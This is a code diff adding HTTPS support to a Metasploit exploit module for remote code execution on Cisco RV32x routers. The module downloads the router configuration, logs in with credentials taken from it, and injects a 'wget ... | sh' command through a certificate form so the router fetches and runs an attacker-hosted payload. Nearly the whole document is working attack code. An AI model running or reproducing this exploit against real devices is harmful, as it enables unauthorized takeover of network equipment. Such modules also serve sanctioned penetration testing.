Checked the functionality of module. Added ability to connect via HTTPS.

modules/exploits/linux/http/cisco_rv32x_rce.rb

@@ -58,8 +58,10 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([
       Opt::RPORT(8007), # port of Cisco webinterface
       OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)', '/']),
-      OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15])
+      OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]),
+      OptBool.new('USE_SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]) # Don't use 'SSL' option to prevent HttpServer from picking this up.
     ])
+    deregister_options('SSL') # prevent SSL in HttpServer and resulting payload requests since the injected wget command will not work with '--no-check-certificate' option.
   end
 
   def execute_command(cmd, opts = {})
@@ -79,13 +81,19 @@ class MetasploitModule < Msf::Exploit::Remote
   def primer
     payload_url = get_uri
     print_status("Downloading configuration from #{peer}")
-    res = send_request_cgi({'uri'=>normalize_uri("cgi-bin","config.exp")})
+    if(datastore['USE_SSL'])
+      print_status("Using SSL connection to router.")
+    end
+    res = send_request_cgi({
+      'uri' => normalize_uri("cgi-bin","config.exp"),
+      'SSL' => datastore['USE_SSL']
+    })
     unless res
       vprint_error('Connection failed.')
       return nil
     end
 
-    unless res.status == 200
+    unless res.code == 200
       vprint_error('Could not download config. Aborting.')
       return nil
     end
@@ -99,6 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Using default auth_key #{authkey}")
     res2 = send_request_cgi({
       'uri' => normalize_uri("cgi-bin","userLogin.cgi"),
+      'SSL' => datastore['USE_SSL'],
       'method' => 'POST',
       'data' => "login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch&current_password=&new_password=&re_new_password="
     })
@@ -108,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return nil
     end
 
-    unless res.status == 200
+    unless res.code == 200
       vprint_error('Login failed with downloaded credentials. Aborting.')
       return nil
     end
@@ -120,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Sending payload. Staging via #{payload_url}.")
     #Build staging command
     command_string = CGI::escape("'$(wget -q -O- #{payload_url}|sh)'")
-    if(command_string.length <= 50)
+    if(command_string.length <= 63)
       print_status("Staging command length looks good. Sending exploit!")
     else
       vprint_error("Warning: Staging command length probably too long. Trying anyway...")
@@ -128,6 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res3 = send_request_cgi({
       'uri' => normalize_uri("certificate_handle2.htm"),
+      'SSL' => datastore['USE_SSL'],
       'method' => 'POST',
       'cookie' => cookies,
         'vars_get' => {
@@ -140,10 +150,10 @@ class MetasploitModule < Msf::Exploit::Remote
                     'submitStatus' => '1',
                     'log_ch' => '1',
                     'type' => '4',
-             'Country' => 'US',
-             'state' => 'CA',
-             'locality' => 'DC',
-             'organization' => 'cc',
+                    'Country' => 'A',
+                    'state' => 'A',
+                    'locality' => 'A',
+                    'organization' => 'A',
                     'organization_unit' => 'A',
                     'email' => 'any@example.com',
                     'KeySize' => '512',